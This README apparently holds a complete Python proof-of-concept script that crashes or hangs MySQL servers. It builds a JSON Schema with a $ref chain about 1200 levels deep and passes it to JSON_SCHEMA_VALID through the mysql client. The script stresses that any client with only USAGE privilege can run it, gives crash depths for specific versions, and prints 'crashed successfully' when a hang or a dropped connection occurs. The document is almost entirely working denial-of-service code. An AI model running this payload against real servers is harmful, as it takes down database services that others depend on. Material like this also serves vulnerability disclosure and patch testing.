README.md
Rendering markdown...
#!/usr/bin/env python3
"""
MySQL JSON_SCHEMA_VALID DoS PoC — deep linear $ref chain
Triggers excessive recursion while validating a JSON Schema, typically causing
mysqld to hang or crash (availability impact).
Any authenticated client can run this attack. Only USAGE on *.* is required:
no SELECT, no table/column grants, and no elevated SQL roles are needed.
Usage: python3 poc_schema_dos.py [--host HOST] [--port PORT] [--user USER] [--password PASS]
"""
import json
import subprocess
import argparse
# Length of the $ref chain that main() passes to build_crash_schema().
# Crash depth - adjust for the MySQL version under test
# (8.0.45: ~1100, ASAN builds: ~500).
DEPTH = 1200
def build_crash_schema(n):
    """Return a schema dict whose root $ref starts a linear chain of n hops.

    Definitions ``l0`` .. ``l{n-1}`` each refer to the next definition via
    ``$ref``; the final definition ``l{n}`` is a plain ``string`` type that
    terminates the chain.
    """
    chain = {
        f'l{idx}': {'$ref': f'#/definitions/l{idx + 1}'}
        for idx in range(n)
    }
    # Terminal node: the only definition that is not itself a reference.
    chain[f'l{n}'] = {'type': 'string'}
    return {'$ref': '#/definitions/l0', 'definitions': chain}
# Fragment of the warning the mysql client prints on stderr whenever a
# password is supplied via --password=...; it is client noise, not a server
# response, and must not influence the verdict.
_CLI_PASSWORD_WARNING = "using a password on the command line interface"


def _server_errors(stderr):
    """Return the client's stderr text without the CLI password warning."""
    kept = [
        line for line in stderr.splitlines()
        if _CLI_PASSWORD_WARNING not in line.lower()
    ]
    return "\n".join(kept).strip()


def _report_failure(stderr):
    """Print a verdict for a mysql client run that exited with non-zero status."""
    message = _server_errors(stderr)
    lowered = message.lower()
    if "$ref" in lowered and "not supported" in lowered:
        print("[!] Target does NOT support $ref keyword - NOT VULNERABLE")
        print(f" Error: {message}")
    elif "function" in lowered and "does not exist" in lowered:
        print("[!] Target does NOT have JSON_SCHEMA_VALID() function")
        print(f" Error: {message}")
        print(" Note: JSON_SCHEMA_VALID() requires MySQL 8.0.17+")
    elif (
        not message
        or "timeout" in lowered
        # Match only dropped-session messages; a bare "connection" substring
        # would also match e.g. "Too many connections" and misreport it.
        or "lost connection" in lowered
        or "server has gone away" in lowered
    ):
        print("[+] MySQL crashed successfully")
    else:
        print(f"[!] Query failed: {message}")


def main():
    """Parse connection options, run the deep-$ref query, and print a verdict.

    The schema produced by ``build_crash_schema(DEPTH)`` is embedded in one
    ``SELECT JSON_SCHEMA_VALID(...)`` statement and executed through the
    ``mysql`` command-line client with a 5 second timeout. A timeout, or a
    non-zero exit whose error output is empty or reports a dropped session,
    is reported as a crash; any other error text is echoed as a failure.
    Returns None; all results are written to stdout.
    """
    parser = argparse.ArgumentParser(
        description='MySQL JSON_SCHEMA_VALID DoS PoC (deep $ref chain)'
    )
    parser.add_argument('--host', default='127.0.0.1', help='MySQL host')
    parser.add_argument('--port', type=int, default=3306, help='MySQL port')
    parser.add_argument('--user', default='root', help='MySQL user')
    parser.add_argument('--password', default='', help='MySQL password')
    args = parser.parse_args()

    schema_json = json.dumps(build_crash_schema(DEPTH))
    # Double any single quote so the JSON text stays inside one SQL literal.
    sql = "SELECT JSON_SCHEMA_VALID('" + schema_json.replace("'", "''") + "', '\"x\"');"

    # Argument list (no shell), so the SQL text needs no shell quoting.
    cmd = ['mysql', f'--host={args.host}', f'--port={args.port}', f'--user={args.user}']
    if args.password:
        cmd.append(f'--password={args.password}')
    cmd.append('--execute=' + sql)

    print(f"[*] Sending crash payload to {args.user}@{args.host}:{args.port}...")
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
    except subprocess.TimeoutExpired:
        # The client never returned within the timeout: treated as a hang.
        print("[+] MySQL crashed successfully (timeout)")
    except Exception as e:
        # Top-level boundary: e.g. the mysql client binary is not installed.
        print(f"[!] Error: {e}")
    else:
        if result.returncode != 0:
            _report_failure(result.stderr)
        else:
            print("[!] Crash failed or MySQL rejected query")
# Run the PoC only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()